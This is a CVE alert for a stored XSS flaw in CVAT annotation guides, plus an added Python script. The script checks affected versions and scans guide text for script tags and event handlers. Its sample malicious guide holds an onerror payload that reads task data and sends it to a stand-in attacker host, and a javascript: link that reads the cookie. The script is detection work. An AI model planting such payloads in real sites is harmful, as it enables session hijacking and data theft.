๐Ÿ” CVE Alert

CVE-2026-44369

Severity: UNKNOWN (CVSS 0.0)

CVAT: Stored XSS via annotation guides

CVSS Score: 0.0
EPSS Score: 0.0%
EPSS Percentile: 0th

CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.5.0 through 2.63.0, an attacker who can create or edit an annotation guide on a task can embed malicious JavaScript in it, and that code runs in the browser of any user who opens the guide. Because the script executes in CVAT's own origin, it can issue arbitrary requests to CVAT with the victim's session and privileges, so guide-edit access on a single task can be turned into whatever the victim (for example, an administrator) is allowed to do. The payload is stored server-side (stored XSS), so every viewer of the guide is exposed until the guide content is cleaned up. The vulnerability is fixed in 2.64.0; after upgrading, review guides that untrusted users could have created or edited, since the upgrade removes the execution path but does not tell you whether a guide already carries such content.
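As an added example (not code from the CVAT project or from the advisory), the script below implements two offline checks an operator might want after reading the entry above: whether a deployed CVAT version falls inside the affected range, and a heuristic scan of stored annotation-guide text for the script-related HTML that CWE-80 describes. The sample guide bodies, the `/api/tasks` path inside the payload and the `attacker.invalid` host are constructed for illustration only; the scan is a review aid, not a sanitizer, and upgrading to 2.64.0 remains the actual fix.

```python
"""Added example for this advisory; not CVAT project code.

Two offline checks an operator might want:
  is_affected(version)  -> is a CVAT version inside the published range
                           (>= 2.5.0, < 2.64.0)?
  scan_guide(markdown)  -> flag script-related HTML in an annotation guide
                           body (the CWE-80 pattern) so guides written by
                           untrusted users can be reviewed.
scan_guide is a detection heuristic over stored text, not a sanitizer:
encoded or obfuscated payloads can evade it, and the rendering fix in
2.64.0 is the real remediation. Sample guide bodies are constructed.
"""
import re

AFFECTED_MIN = (2, 5, 0)   # first affected release, per the advisory
FIXED = (2, 64, 0)         # release that carries the fix, per the advisory


def parse_version(version: str) -> tuple:
    """'v2.63.0' / '2.63.0' / '2.63.0rc1' -> (2, 63, 0); suffixes ignored."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised CVAT version: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version: str) -> bool:
    """True when version is in [2.5.0, 2.64.0)."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


# Indicators of script execution in HTML, or in Markdown that renders to HTML.
# Each maps a finding name to a case-insensitive pattern.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.I),
    "javascript_url_attr": re.compile(
        r"\b(href|src|action|formaction)\s*=\s*['\"]?\s*javascript:", re.I),
    "markdown_javascript_link": re.compile(r"\]\(\s*javascript:", re.I),
    "embedding_tag": re.compile(r"<\s*(iframe|object|embed)\b", re.I),
    "svg_or_math_tag": re.compile(r"<\s*(svg|math)\b", re.I),
}


def scan_guide(markdown: str) -> list:
    """Return (finding_name, line_number, snippet) for every matching line."""
    findings = []
    for lineno, line in enumerate(markdown.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((name, lineno, line.strip()[:80]))
    return findings


# Constructed sample guides (not real CVAT data).
BENIGN_GUIDE = """# Pedestrian labelling guide
Draw one bounding box per visible person.
Reference image: ![example](/static/guide/example.png)
Policy: [labelling policy](https://example.invalid/policy)
"""

# The payload uses an image error handler and a javascript: link; the
# /api/tasks path and attacker host are illustrative, not from the advisory.
MALICIOUS_GUIDE = """# Pedestrian labelling guide
<img src=x onerror="fetch('/api/tasks').then(r=>r.text()).then(t=>fetch('https://attacker.invalid/?d='+btoa(t)))">
More tips [here](javascript:alert(document.cookie)).
"""


def audit(version: str, guides: dict) -> dict:
    """Summarise exposure: version status plus per-guide findings."""
    return {
        "version": version,
        "affected": is_affected(version),
        "guides": {name: scan_guide(body) for name, body in guides.items()},
    }


if __name__ == "__main__":
    report = audit("2.63.0", {"benign": BENIGN_GUIDE, "malicious": MALICIOUS_GUIDE})
    print(f"CVAT {report['version']} affected: {report['affected']}")
    for guide, findings in report["guides"].items():
        print(f"{guide}: {len(findings)} finding(s)")
        for name, lineno, snippet in findings:
            print(f"  line {lineno} [{name}] {snippet}")
```

The version check compares only the numeric triple, so pre-release suffixes are ignored; the guide scan works line by line and reports the first 80 characters of each hit so a reviewer can locate it. Treat any finding as a reason to inspect the guide by hand rather than as proof of compromise, and treat an empty result as no more than "nothing obvious".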

CWE: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page)
Vendor: cvat-ai
Product: cvat
Published: May 13, 2026

Affected Versions

cvat-ai / cvat
>= 2.5.0, < 2.64.0

References

NVD, CVE.org, EPSS Data
GitHub advisory: https://github.com/cvat-ai/cvat/security/advisories/GHSA-m2h7-6xqm-p9v5
GitHub commit: https://github.com/cvat-ai/cvat/commit/ad9e90003d8234ac7602598b109dc11450321dfc